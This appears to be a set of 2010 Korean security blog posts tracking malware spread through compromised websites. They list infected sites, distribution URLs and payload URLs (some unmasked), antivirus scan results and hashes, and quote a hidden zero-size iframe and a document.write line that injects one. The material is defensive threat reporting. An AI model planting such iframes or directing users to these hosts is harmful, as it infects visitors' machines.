posted by Kwan's 2010. 11. 23. 12:02

1. 사이트 !!

레이xx 클럽 : http://www.rxxexx.co.kr
옐xx x 택배 : http://www.yelxxxxx.co.kr
피자 xx : http://www.pizzxexxxx.com
게xx젤 : http://www.gaxxxxxel.com
개xx 닷컴 : http://www.gexxmxon.com
安康x政网x迎您 : http://www.xxcx.gov.cn
브레이크 xx : http://www.breakxxxx.com
한국xxxxx연합회 : http://www.xxxwxl.or.kr 外 다수

2. 유포지 !!

[어디서 유포됐는지 모르는 곳]

2010/11/20

http://1x4.2xx.87.1x5/help.asp

[레이xx 클럽, 옐xx x 택배, 피자 xx]

2010/11/17

http://58.1xx.227.1x/F.asp
http://58.1xx.227.1x/./F2.asp 

2010/11/20

http://123.2x4.1x2.1xx/P.asp
http://123.2x4.1x2.1xx/./P1.asp

[게XX젤]

2010/11/20 ~ 2010/11/21

http://cyxxx.net/adv.htm ~> XOR 변형 필요 !!
http://cyxxx.net/K.Js 

[개xx 닷컴]

2010/11/21

http://118.2xx.181.1x9:9x99/vod.js
http://118.2xx.181.1x9:9x99/vod.asp
http://118.2xx.181.1x9:9x99/index.htm
http://114.20x.87.xx/test.htm
http://114.20x.87.xx/test.htm

[安康x政网x迎您]

2010/11/21

http://www.bjxrmxx.com/maxxgeradmin/dataxxckup/ie.htm
http://www.bjxrmxx.com/maxxgeradmin/dataxxckup/pack.exe
http://www.bjxrmxx.com/maxxgeradmin/dataxxckup/test.html

[브레이크 xx]

2010/11/21

http://www.breakxxxx.com/xxxx/tv.htm
http://www.breakxxxx.com/xxxx/tvx.html
http://www.breakxxxx.com/xxxx/tvj.html

[한국XXXXX연합회]

2010/11/07

http://www.woxxxzz.com/images/img.js
http://www.woxxxzz.com/images/kol.htm
http://www.woxxxzz.com/images/sky.html
http://www.woxxxzz.com/images/count.html

2010/11/11

http://www.xxbax.com/DicxData/img.js
http://www.xxbax.com/DicxData/kol.htm
http://www.xxbax.com/DicxData/sky.html
http://www.xxbax.com/DicxData/count.html

2010/11/20

http://www.sxmxxcaux.com/imagex/pic.js
http://www.samxxcaux.com/imagex/sos.htm
http://www.samxxcaux.com/imagex/ner.html
http://www.samxxcaux.com/imagex/count.html

2010/11/23

http://www.xuxx9.com/image/pic.js
http://www.xuxx9.com/image/ner.html
http://www.xuxx9.com/image/sos.htm
http://www.xuxx9.com/image/count.html

3. 최종파일 !!

help.asp : http://121.2xx.1x5.2xx/wxc/ad.exe

F.asp , F2.asp : http://cybexoxxhid.net/bxs/xxon/c.exe

P.asp , P1.asp : http://www.vxx.co.kr/cxxd/lib.exe

adv.htm : http://cyxxx.net/cy.exe

vod.asp : http://www.robotxxx.com/cafe/hxxx/box.exe

test.htm : http://www.robotxxx.com/cafe/xxxx/page/mam.exe

test.html : http://1x7.x.0.1/a.exe  http://www.xjsrmxx.com/maxxgeradmin/dataxxckup/scvhost.txt

tvx.html : http://128.1xx.3x.8x/w.exe

tvj.html : http://128.1xx.30.8x/s.exe

[2010/11/07]

kol.htm , sky.html : http://www.Jxcxx.com/images/s.exe

[2010/11/11]

kol.htm , sky.html : http://www.plxtixxxchina.com/images/s.exe

s.exe : http://98.1xx.64.1xx:6x688/img/img.txt 
           http://98.1xx.64.1xx:6x688/img/Advythsvlfgmf1.exe

[2010/11/20]

sos.htm , ner.html : http://www.cnxx.com.cn/images/s.exe

s.exe : http://www.xamxxcaux.com/images/count.html
           http://76.7x.8x.2:6xx88/img/YkaposdYals1.exe

[2010/11/23]

ner.html , sos.htm : http://www.uxxxn.cn/images/s.exe

s.exe : http://76.7x.8x.3:616xx/img/img.txt
           http://76.7x.8x.3:616xx/img/SkaposKdyals1.exe

4. 샘플 진단 현황 !! 

 [안철수연구소]

1. ner.html ~> 악성
2. sos.htm ~> 악성
3. pic.js ~> 악성
4. P.asp ~> 악성
5. P1.asp ~> V3 : JS/Downloader(추가 : 2010.11.22.04)
6. lib.exe ~> V3 : Win-Trojan/Injector.103437(추가 : 2010.11.22.04)
7. cy.exe_Kwan ~> V3 : Win-Trojan/Vilsel.106496.G(추가 : 2010.11.22.02)
8. help.asp ~> V3 : JS/Downloader(추가 : 2010.11.22.02)
9. s.exe ~> V3 : Win-Trojan/Xema.variant(추가 : 2010.11.22.01)
10. YkaposdYals1.exe ~> V3 : Win-Trojan/Securisk(추가 : 2010.11.21.01)
11. ad.exe ~> V3 : Win-Trojan/Injector.55296.BD(추가 : 2010.11.21.01)
12. adv.htm ~> V3 : JS/Cve-2010-0806(추가 : 2010.11.21.01)
13. cy.exe ~> 정상
14. ie.htm ~> V3 : JS/Exploit-cve(추가 : 2010.11.22.02) 
15. tv.htm ~> V3 : JS/Agent(추가 : 2010.11.22.02) 
16. tvx.html ~> V3 : JS/Exploit-cve(추가 : 2010.11.22.02) 
17. scvhost.txt ~> V3 : Win-Trojan/Malware.153349(추가 : 2010.11.22.00) 
18. pack.exe_xor ~> V3 : Win-Trojan/Malware.153349(추가 : 2010.11.22.00) 
19. s.exe ~> V3 : Win-Trojan/Injector.55296.BE(추가 : 2010.11.21.01) 
20. mam.exe ~> V3 : Win-Trojan/Onlinegamehack.55296.BB(추가 : 2010.11.21.01)
21. box.exe ~> V3 : Win-Trojan/Onlinegamehack.55296.BB(추가 : 2010.11.21.01) 
22. w.exe ~> V3 : Win-Trojan/Injector.55296.BE(추가 : 2010.11.21.01) 
23. vod.asp ~> V3 : JS/Exploit(추가 : 2010.11.21.01) 
24. tvj.html ~> V3 : JS/Shellcode(추가 : 2010.11.18.05) 
25. test.html ~> V3 : JS/Cve-2010-3962(추가 : 2010.11.13.00) 
26. test.htm ~> V3 : HTML/Agent(추가 : 2010.11.13.00) 
27. ak.swf ~> 정상
28. vod.js ~> 정상
29. index.htm ~> 정상
30. ner.html ~ 악성
31. pic.js ~> 악성
32. sos.htm ~> 악성
33. SkaposKdyals1.exe ~> 악성
34. s.exe ~> 악성

[이스트 소프트]

모든 샘플 업데이트 추가 완료 !!!

[네이버 , 잉카인터넷]

분석 후 샘플 업데이트 반영 !!

엄청난 샘플양으로 인하여 바이러스 토탈 결과는 생략합니다~
올만에 쓸려니 많이 힘드네요 !!ㅎ

댓글을 달아 주세요

posted by Kwan's 2010. 10. 1. 09:23

세의님의 알라딘 시리즈에 이어서 이에 뒤질세라 평일에 포털사이트인 캐리어도 유포를 시작하였습니다.현재 페이지는 오늘 오후에 변조가 되었음을 확인하였습니다. 그 결과 http://job.XXXX.net 에도 악성링크가 삽입되어서 현재는 취업 사이트인 캐리어와 잡 NEXT에서 유포 되고 있음을 확인 할 수 있습니다 !!

지난주에도 글을 쓸까 말까 하다가 이번에 다시 유포되고 있어서 이렇게 글을 써봅니다. 아무튼 이 사이트 둘은 매우 조심해야 아니 들어가지 말아야합니다 !! 악성코드는 캐리어와 NEXT음에서 유포하고 있습니다. 현재 원인으로써는 먼저 감염된 커리어에 있는거 같습니다. 커리어 http://www.caxxxx.co.kr/js/job_rnd_list.js 에서 job.XXXX.net 으로 유입된거 같습니다.
어쨌든 캐리어는 메인사이트에 들어가는 동시에 JOB NEXT음 은 JOB에 들어가는 동시에 감염이 되는거 같습니다.

[정리]

최초 유포지 : http://www.caxxxx.co.kr/
2차 유포지 : http://job.xxxx.net 
악성코드 아이프레임 삽입 : http://xxxx.xxxx.net/xx/jquery.min.js 
악성코드 연결 JS : http://2xx.143.48.xxx/xx/si.js 
최종파일 연결 : http://2xx.143.48.xxx/xx/si.asp
최종파일 : http://www.sixxx.or.kr/xxot/txxx/down.exe

그중 si.js는 출력에만 접근한다면 쉽게 asp가 나올 수 있습니다.

출력 : document.write("<iframe src= http://2xx.143.48.xxx/xx/si.asp width=0 height=0></iframe>");

[바이러스 토탈]

File name:

si.js

Result:
6/ 43 (14.0%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 JS/Downloader
AntiVir 7.10.12.92 2010.09.30 -
Antiy-AVL 2.0.3.7 2010.09.30 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.09.30 HTML:IFrame-JK
Avast5 5.0.594.0 2010.09.30 HTML:IFrame-JK
AVG 9.0.0.851 2010.09.30 -
BitDefender 7.2 2010.09.30 -
CAT-QuickHeal 11.00 2010.09.30 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6248 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.09.30 -
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7885 2010.09.30 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 HTML:IFrame-JK
Ikarus T3.1.1.90.0 2010.09.30 -
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 -
Kaspersky 7.0.0.125 2010.10.01 -
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.09.30 Heuristic.LooksLike.JS.Suspicious.B
Microsoft 1.6201 2010.09.30 -
NOD32 5493 2010.09.30 -
Norman 6.06.07 2010.09.30 -
nProtect 2010-09-30.01 2010.09.30 -
Panda 10.0.2.7 2010.09.30 -
PCTools 7.0.3.5 2010.10.01 -
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 Mal/Iframe-Gen
Sunbelt 6952 2010.09.30 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.09.30 -
TheHacker 6.7.0.1.041 2010.09.30 -
TrendMicro 9.120.0.1004 2010.09.30 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.09.27 -
ViRobot 2010.8.31.4017 2010.09.30 -
VirusBuster 12.66.8.0 2010.09.30 -
MD5: 82360d68e71cf37ae4400295f1746f08
SHA1: f67661ca29e253fde9bfda1ab5e0f54a0ddbf9dc
SHA256: 0536c42b0bbcbc8a4db28fe2f0931eee93bda5b1c8586682293e1a8664fc61de
File size: 424 bytes
Scan date: 2010-10-01 00:13:28 (UTC)

File name:
si.asp
Result:
6/ 43 (14.0%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 JS/Cve-2010-0806
AntiVir 7.10.12.92 2010.09.30 JS/Small.R
Antiy-AVL 2.0.3.7 2010.09.30 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.09.30 JS:Downloader-RN
Avast5 5.0.594.0 2010.09.30 JS:Downloader-RN
AVG 9.0.0.851 2010.09.30 -
BitDefender 7.2 2010.09.30 -
CAT-QuickHeal 11.00 2010.09.30 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6248 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.09.30 -
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7885 2010.09.30 -
F-Prot 4.6.2.117 2010.09.30 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 JS:Downloader-RN
Ikarus T3.1.1.90.0 2010.09.30 -
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 Riskware
Kaspersky 7.0.0.125 2010.10.01 Exploit.JS.CVE-2010-0806.z
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.09.30 Heuristic.BehavesLike.JS.BufferOverflow.A
Microsoft 1.6201 2010.09.30 -
NOD32 5493 2010.09.30 -
Norman 6.06.07 2010.09.30 -
nProtect 2010-09-30.01 2010.09.30 Script-JS/W32.Agent.AEQ
Panda 10.0.2.7 2010.09.30 -
PCTools 7.0.3.5 2010.10.01 -
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 Trojan.DL.Script.JS.Agent.qx
Sophos 4.58.0 2010.10.01 Mal/JSBO-Gen
Sunbelt 6952 2010.09.30 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.09.30 -
TheHacker 6.7.0.1.041 2010.09.30 -
TrendMicro 9.120.0.1004 2010.09.30 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.09.27 -
ViRobot 2010.8.31.4017 2010.09.30 JS.EX-CVE-2010-0806.5882.B
VirusBuster 12.66.8.0 2010.09.30 -
MD5: 5d9c846e08a768f648080e5d207aeb47
SHA1: f24d4dba37fd16eba993f337dbf357fca94dc533
SHA256: d795c3be4ec899f70b4b6c6c5e6900ef0537001072b92a304319c6f314d09034
File size: 6015 bytes
Scan date: 2010-10-01 00:13:31 (UTC)


File name:
down.exe
Result:
30/ 43 (69.8%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 Win-Trojan/Agent.54272.NF
AntiVir 7.10.12.92 2010.09.30 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.09.30 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.09.30 Win32:Malware-gen
Avast5 5.0.594.0 2010.09.30 Win32:Malware-gen
AVG 9.0.0.851 2010.09.30 PSW.Generic8.VIP
BitDefender 7.2 2010.09.30 Gen:Trojan.Heur.Zbot.dmW@cevx5Cj
CAT-QuickHeal 11.00 2010.09.30 (Suspicious) - DNAScan
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6248 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 Trojan.PWS.Siggen.8181
Emsisoft 5.0.0.50 2010.09.30 Trojan.Win32.Pincav!IK
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7886 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cevx5Cj
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cevx5Cj
Ikarus T3.1.1.90.0 2010.09.30 Trojan.Win32.Pincav
Jiangmin 13.0.900 2010.09.30 Trojan/Invader.add
K7AntiVirus 9.63.2648 2010.09.30 Trojan
Kaspersky 7.0.0.125 2010.10.01 Trojan.Win32.Pincav.ahzv
McAfee 5.400.0.1158 2010.10.01 Generic.dx!tzh
McAfee-GW-Edition 2010.1C 2010.09.30 Generic.dx!tzh
Microsoft 1.6201 2010.09.30 PWS:Win32/Magania.BQ
NOD32 5493 2010.09.30 a variant of Win32/PSW.Gamania.NBT
Norman 6.06.07 2010.09.30 -
nProtect 2010-09-30.01 2010.09.30 -
Panda 10.0.2.7 2010.09.30 Generic Trojan
PCTools 7.0.3.5 2010.10.01 Trojan-PSW.Gampass
Prevx 3.0 2010.10.01 High Risk Cloaked Malware
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 Mal/Dorf-F
Sunbelt 6952 2010.09.30 Trojan.Win32.Generic!BT
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.09.30 Infostealer.Gampass
TheHacker 6.7.0.1.041 2010.09.30 Trojan/Pincav.ahzv
TrendMicro 9.120.0.1004 2010.09.30 TROJ_PINCAV.SMXA
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 TROJ_PINCAV.SMXA
VBA32 3.12.14.1 2010.09.27 Malware-Cryptor.Inject.gen
ViRobot 2010.8.31.4017 2010.09.30 -
VirusBuster 12.66.8.0 2010.09.30 Trojan.Pincav.IVM
MD5: 18d7b00b5d37587c7456b3c3a1181a69
SHA1: fcb91ed3d3b5e498bf3b4ce508351f3e3c51dab5
SHA256: 960af5ab7b18c06b4e4bb0580265585df20510f025b89300e7f364e800cbfa83
File size: 54272 bytes
Scan date: 2010-10-01 00:19:25 (UTC)

신고업체 : 안철수연구소 이스트 소프트 , 네이버 , 잉카인터넷 

[안철수연구소]

1 si.js ~> V3 : JS/Downloader(추가 : 2010.10.01.00) 
2 down.exe ~> V3 : Win-Trojan/Agent.54272.NF(추가 : 2010.10.01.00) 
3 si.asp ~> V3 : JS/Cve-2010-0806(추가 : 2010.10.01.00)

이전 게시글

[security/보안 뉴스] - [카스퍼스키] 2010년 8월 악성 프로그램 통계
[security/악성코드 유포] - yahoo.js 의 유포날짜 2차 정리 !!
[security/악성코드 유포] - 아스키 코드로 이루어진 악성 아이프레임 !!

댓글을 달아 주세요

  1. 2010.10.01 11:12  Addr  Edit/Del  Reply

    비밀댓글입니다

posted by Kwan's 2010. 7. 9. 14:34
지금 현재 모 휴대폰 통신사 큐x텔에는 악성 아이프레임이 삽입되어서 연결하고 있는것으로 보인다,.
사이트 내 소스를 보면 금방 악성코드가 삽입되어 있는것을 볼 수가 있다 !!
</script>
</head>
<iframe height=0 width=0 Src= http://110.xx.139.2x1/css/Lib.asp </iframe>
<body style="margin:0" bgcolor="#ffffff">
<script language="JavaScript">flash('/inc/flash/main.swf','936','232','1');</script>

몇주동안 잠잠 하더니 자시 한번 악성코드에 감염된거 같다. 2주만에 다시 그러니 관리자가 뭐하고 있는지. 그래도 스크립트는 오래된것이 아니라 그런지 대부분의 업체에서 전부 진단을 함으로 신고 할 필요가 없을듯 싶다. 최종파일 위치까지 예전이랑 똑같아서 이제는 그럴려니 하고 넘어간다. 그래도 통신사인데 휴대폰 업데이트나 , 정보를 찾아가는 사람들이 백신이 없다면 감염되기 쉽상일꺼 같다. 빨리 관리자 분이 보셔서 삭제하길 희망한다. !!

감염 사이트 : http://www.cuxxtel.com
악성유포지 :  http://110.xx.139.2x1/css/Lib.asp
최종파일 : http://61.1xx.x.93/css/isa.exe

[바이러스 토탈 결과]

검사 파일: lib.asp 전송 시각: 2010.07.09 05:04:15 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.09 Virus.JS.Downloader.QJ!IK
AhnLab-V3 2010.07.09.00 2010.07.08 JS/Downloader
AntiVir 8.2.4.10 2010.07.08 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.09 -
Avast 4.8.1351.0 2010.07.08 JS:Downloader-QJ
Avast5 5.0.332.0 2010.07.08 JS:Downloader-QJ
AVG 9.0.0.836 2010.07.08 Script/Exploit
BitDefender 7.2 2010.07.09 Trojan.Script.407264
CAT-QuickHeal 11.00 2010.07.09 -
ClamAV 0.96.0.3-git 2010.07.08 -
Comodo 5368 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.09 -
eSafe 7.0.17.0 2010.07.08 -
eTrust-Vet 36.1.7693 2010.07.08 -
F-Prot 4.6.1.107 2010.07.08 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.07.09 Trojan.Script.407264
Fortinet 4.1.133.0 2010.07.08 -
GData 21 2010.07.09 Trojan.Script.407264
Ikarus T3.1.1.84.0 2010.07.09 Virus.JS.Downloader.QJ
Jiangmin 13.0.900 2010.07.08 -
Kaspersky 7.0.0.125 2010.07.09 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.07.09 -
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5902 2010.07.08 -
NOD32 5263 2010.07.08 probably a variant of JS/TrojanDownloader.Agent
Norman 6.05.11 2010.07.08 -
nProtect 2010-07-08.01 2010.07.08 Script-JS/W32.Agent.WH
Panda 10.0.2.7 2010.07.08 -
PCTools 7.0.3.5 2010.07.09 -
Prevx 3.0 2010.07.09 -
Rising 22.55.04.01 2010.07.09 Trojan.DL.Script.JS.Agent.qx
Sophos 4.54.0 2010.07.09 JS/Agent-MZX
Sunbelt 6562 2010.07.09 -
Symantec 20101.1.0.89 2010.07.09 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.09 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.09 -
VBA32 3.12.12.6 2010.07.08 -
ViRobot 2010.6.29.3912 2010.07.09 JS.S.Agent.5851
VirusBuster 5.0.27.0 2010.07.08 -
 
추가 정보
File size: 5851 bytes
MD5...: 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1..: e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9
검사 파일: isa.exe 전송 시각: 2010.07.09 05:04:22 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.09 Trojan.Peed!IK
AhnLab-V3 2010.07.09.00 2010.07.08 Win-Trojan/Onlinegamehack.55296.G
AntiVir 8.2.4.10 2010.07.08 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.09 -
Avast 4.8.1351.0 2010.07.08 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.08 Win32:Malware-gen
AVG 9.0.0.836 2010.07.08 PSW.Generic8.DOZ
BitDefender 7.2 2010.07.09 Trojan.Generic.KD.18284
CAT-QuickHeal 11.00 2010.07.09 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.07.08 Trojan.Agent-164869
Comodo 5368 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.09 -
eSafe 7.0.17.0 2010.07.08 Win32.TRCrypt.ZPACK
eTrust-Vet 36.1.7693 2010.07.08 -
F-Prot 4.6.1.107 2010.07.08 -
F-Secure 9.0.15370.0 2010.07.09 Trojan.Generic.KD.18284
Fortinet 4.1.133.0 2010.07.08 -
GData 21 2010.07.09 Trojan.Generic.KD.18284
Ikarus T3.1.1.84.0 2010.07.09 Trojan.Peed
Jiangmin 13.0.900 2010.07.08 Trojan/PSW.Magania.anlt
Kaspersky 7.0.0.125 2010.07.09 -
McAfee 5.400.0.1158 2010.07.09 PWS-Mmorpg!pq
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.LooksLike.Trojan.Crypt.ZPACK.B
Microsoft 1.5902 2010.07.08 PWS:Win32/Magania.gen
NOD32 5263 2010.07.08 -
Norman 6.05.11 2010.07.08 W32/Suspicious_Gen2.BHOYR
nProtect 2010-07-08.01 2010.07.08 Trojan/W32.Agent.55296.IL
Panda 10.0.2.7 2010.07.08 Trj/CI.A
PCTools 7.0.3.5 2010.07.09 -
Prevx 3.0 2010.07.09 High Risk Cloaked Malware
Rising 22.55.04.01 2010.07.09 Trojan.Win32.Generic.521B263B
Sophos 4.54.0 2010.07.09 Sus/UnkPack-C
Sunbelt 6562 2010.07.09 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.07.09 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.09 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.07.09 -
VBA32 3.12.12.6 2010.07.08 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.6.29.3912 2010.07.09 Trojan.Win32.PSWMagania.55296.K
VirusBuster 5.0.27.0 2010.07.08 -
 
추가 정보
File size: 55296 bytes
MD5...: a4bd25915a827fe01c44926cc44273fe
SHA1..: 0748e6f3d2a27a5b852737bd40a86d9dcdce06c3
SHA256: d030b52bafbe52bb6e2527e94a325b1e3c996e17eab2789c601179bdb5e9c9ea


[이전글]

[security/악성코드 유포] - http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK
[security/악성코드 유포] - http://gft54577.3xx2.org:6677/x/index.html 변조!!

댓글을 달아 주세요

  1. hoo 2010.07.09 16:41  Addr  Edit/Del  Reply

    줄기차게 나오네요..
    잘보고 갑니다~

    • Kwan's 2010.07.10 17:30 신고  Addr  Edit/Del

      Lib.asp 는 항상 똑같은곳에서 유포하는데 아직까지도 삭제되지않는거 보니 관리자가 손을 놓고 있나봐요~

posted by Kwan's 2010. 5. 17. 12:26

1. 사이트

한국 E 스포츠 협회 : http://www.xrogamer.or.kr 
대명 리조트 : http://www.xaemyungresort.com/asp/main.asp0
프루나 : http://www.xruna.com
프루나 서치 : http://vxd.xruna.com/search/search_list3.asp0
CJ 엔터테인먼트 : http://www.xjent.co.kr
SSO KBS : http://sso.xbs.co.kr
시네마 Kbs : http://xnema.kbs.co.kr
씨네통 : http://www.xnetong.com
게임타임 : http://www.xametime.co.kr/main.asp
 
2. 유포 사이트

1. 한국 E 스포츠 협회
http://61.100.9.219/club/xod.asp  ~> 서버 살아있음!
http://61.100.7.171/css/xib.asp ~> 서버 죽음!
http://97.xx.8x.1x8/xM.asp ~> 서버 살아있음!

2. 대명 리조트
http://61.100.9.219/club/xod.asp ~> 서버 살아있음!

3. 프루나
http://61.100.9.219/club/xod.asp  ~> 서버 살아있음!

4.프루나 서치
http://vxd.xruna.com/search/xearch_list3.asp ~> 서버 살아있음!

5. CJ 엔터테인먼트
http://61.100.7.171/css/xib.asp ~> 서버 죽음!
http://ac.gemmir.com/t/xime.asp ~> 서버 죽음!

6. SSO KBS
http://202.133.245.100/xxam.asp ~> 서버 살아있음!

7. 시네마 Kbs
http://220.95.233.16/ads/xime.asp ~> 서버 죽음!

8. 씨네통
http://97.74.87.198/xM.asp ~> 서버 살아있음!
http://www.kpma.or.kr/css/MG.asp0 ~> 서버 살아있음!

9. 게임타임

http://adsys.gametime.co.kr/include/topbenner_s2.asp ~> 서버 살아있음!
http://koreachangup.chosun.com/css/ads.asp ~> 서버 살아있음!

최종파일 :

god.asp , lib.asp : http://x1.100.1.93/css/isa.exe ~> 서버 살아있음!

time.asp : http://www.xobot114.com/cafe/help/box.exe ~> 서버 살아있음!

GM.asp , MG.asp : http://x1.100.1.93/admin/G.exe ~> 서버 살아있음!

sxxxxh_xxx3.asp : http://xile.ygfamily.com/php/i./c.exe ~> 서버 살아있음!

exam.asp : http://xwww.erounmall.com/cache/tmp/514.exe ~> 서버 살아있음!
 
ads.asp : http://xoreachangup.chosun.com/1.exe ~> 서버 살아있음! (XOR 변형 필요)

[바이러스 토탈]

검사 파일: god.asp 전송 시각: 2010.05.17 01:17:28 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 Virus.JS.Downloader.QJ!IK
AhnLab-V3 2010.05.16.00 2010.05.15 JS/Downloader
AntiVir 8.2.1.242 2010.05.16 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 JS:Downloader-QJ
Avast5 5.0.332.0 2010.05.16 JS:Downloader-QJ
AVG 9.0.0.787 2010.05.16 Script/Exploit
BitDefender 7.2 2010.05.17 Trojan.Script.407264
CAT-QuickHeal 10.00 2010.05.15 -
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 -
DrWeb 5.0.2.03300 2010.05.17 -
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.05.17 Trojan.Script.407264
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 Trojan.Script.407264
Ikarus T3.1.1.84.0 2010.05.17 Virus.JS.Downloader.QJ
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.05.17 -
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5703 2010.05.17 -
NOD32 5119 2010.05.17 -
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 Trojan.Script.407264
Panda 10.0.2.7 2010.05.16 -
PCTools 7.0.3.5 2010.05.17 -
Prevx 3.0 2010.05.17 -
Rising 22.47.06.04 2010.05.16 Trojan.DL.Script.JS.Agent.qx
Sophos 4.53.0 2010.05.17 JS/Agent-MZX
Sunbelt 6311 2010.05.17 -
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 -
ViRobot 2010.5.15.2318 2010.05.16 JS.S.Agent.5851
VirusBuster 5.0.27.0 2010.05.16 -
 
추가 정보
File size: 5851 bytes
MD5...: 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1..: e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9
검사 파일: GM.asp 전송 시각: 2010.05.17 01:17:38 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 -
AhnLab-V3 2010.05.16.00 2010.05.15 -
AntiVir 8.2.1.242 2010.05.16 -
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 JS:Downloader-RN
Avast5 5.0.332.0 2010.05.16 JS:Downloader-RN
AVG 9.0.0.787 2010.05.16 Script/Exploit
BitDefender 7.2 2010.05.17 -
CAT-QuickHeal 10.00 2010.05.15 -
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 -
DrWeb 5.0.2.03300 2010.05.17 -
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.05.17 -
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 JS:Downloader-RN
